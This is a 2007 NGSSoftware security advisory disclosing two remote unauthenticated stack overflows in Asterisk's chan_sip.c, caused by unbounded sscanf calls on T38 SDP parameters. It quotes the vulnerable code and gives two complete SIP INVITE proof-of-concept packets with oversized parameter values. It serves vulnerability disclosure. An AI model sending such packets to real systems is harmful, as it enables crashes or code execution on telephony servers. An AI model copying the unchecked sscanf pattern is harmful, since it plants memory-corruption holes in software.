<<< Date Index >>>     <<< Thread Index >>>

Multiple Remote unauthenticated stack overflows in Asterisk chan_sip.c



=======
Summary
=======
Name: Multiple Remote unauthenticated stack overflows in Asterisk chan_sip.c
Release Date:  4 July 2007
Reference: NGS00497
Discover: Barrie Dempster <barrie@xxxxxxxxxxxxxxx>
Vendor: Digium
Vendor Reference: ASA-010
Systems Affected: Asterisk < 1.4.3; AsteriskNOW < Beta6; Asterisk
Appliance Developers Kits < 0.4.0
Risk: Critical
Status: Published

========
TimeLine
========
Discovered: 19 March 2007
Released: 12 April 2007
Approved: 12 April 2007
Reported: 22 March 2007
Fixed: 25 April 2007
Published:  4 July 2007

===========
Description
===========
Two closely related stack based buffer overflows exist in the SIP/SDP
handler of Asterisk, the vulnerabilities are very similar but exist as
two separate unsafe function calls. The T38FaxRateManagement and
T38FaxUdpEC SDP parameters can be exploited remotely leading to
arbitrary code execution without authentication.
In order for these overflows to occur, t38 fax over SIP must be enabled
in sip.conf
Examples of SIP INVITE packets are shown in the details section, however
these vulnerabilities can be triggered with a number of different SIP
messages affecting calls received by Asterisk, or in response to calls
made by Asterisk.

NGS would like to thank Digium and specifically Kevin P. Fleming for
liaising with us in resolving this issue promptly and responsibly.

=================
Technical Details
=================
Remote Unauthenticated stack overflow in Asterisk SIP/SDP
T38FaxRateManagement parameter

A remote unauthenticated stack overflow exists in the SIP/SDP handler of
Asterisk. By sending a SIP packet with SDP data which includes an overly
long T38 parameter it is possible to overflow a stack based buffer and
execute arbitrary code.

The process_sdp function of chan_sip.c in Asterisk contains the
following vulnerable call to sscanf.

else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
                                found = 1;
                                if (option_debug > 2)

ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
                                if (!strcasecmp(s, "localTCF"))
                                        peert38capability |=
T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
                                else if (!strcasecmp(s, "transferredTCF"))
                                        peert38capability |=
T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;

This attempts to read the "T38FaxRateManagement:" option from the SDP
within a SIP packet and copy the succeeding string into "s". There are
no checks on the length of this string and we can therefore write past
the boundaries of the "s" variable overwriting adjacent memory on the
stack. "s" is defined earlier in this function as being a character
array of only 256 bytes.

The following example packet demonstrates an overflow of this parameter:

INVITE sip:200@xxxxxxxxx SIP/2.0
Date: Wed, 21 Mar 2007 4:20:09 GMT
CSeq: 1 INVITE
Via: SIP/2.0/UDP
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
User-Agent: NGS/2.0
From: "Barrie Dempster"
<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
To: <sip:200@localhost>
Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 796
Max-Forwards: 70

v=0
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=image 5004 UDPTL t38
a=T38FaxVersion:0
a=T38MaxBitRate:14400
a=T38FaxMaxBuffer:1024
a=T38FaxMaxDatagram:238
a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
a=T38FaxUdpEC:t38UDPRedundancy

-------------------------------------------------

Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC
parameter

A remote unauthenticated stack overflow exists in the SIP/SDP handler of
Asterisk. By sending a SIP packet with SDP data which includes an overly
long T38FaxUdpEC parameter it is possible to overflow a stack based
buffer and execute arbitrary code.

The process_sdp function of chan_sip.c in Asterisk contains the
following vulnerable call to sscanf.

else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
                                found = 1;
                                if (option_debug > 2)
                                        ast_log(LOG_DEBUG, "UDP EC: %s\n",
s);
                                if (!strcasecmp(s, "t38UDPRedundancy")) {
                                        peert38capability |=
T38FAX_UDP_EC_REDUNDANCY;

ast_udptl_set_error_correction_scheme(p->udptl,
UDPTL_ERROR_CORRECTION_REDUNDANCY);

This attempts to read the "T38FaxUdpEC:" option from the SDP within a
SIP packet and copy the succeeding string into "s". There are no checks
on the length of this string and we can therefore write past the
boundaries of the "s" variable overwriting adjacent memory on the stack.
"s" is defined earlier in this function as being a character array of
only 256 bytes.
The following example packet demonstrates an overflow of this parameter:

INVITE sip:200@xxxxxxxxx SIP/2.0
Date: Wed, 21 Mar 2007 4:20:09 GMT
CSeq: 1 INVITE
Via: SIP/2.0/UDP
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
User-Agent: NGS/2.0
From: "Barrie Dempster"
<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
To: <sip:200@localhost>
Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 796
Max-Forwards: 70

v=0
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=image 5004 UDPTL t38
a=T38FaxVersion:0
a=T38MaxBitRate:14400
a=T38FaxMaxBuffer:1024
a=T38FaxMaxDatagram:238
a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

===============
Fix Information
===============
Updated packages for:
Asterisk can be found on http://www.asterisk.org
AsteriskNOW can be found on http://www.asterisknow.org

Appliance Developer Kit customers should contact Digium for update advice.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070
--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1
4BF with Company Number 04225835 and VAT Number 783096402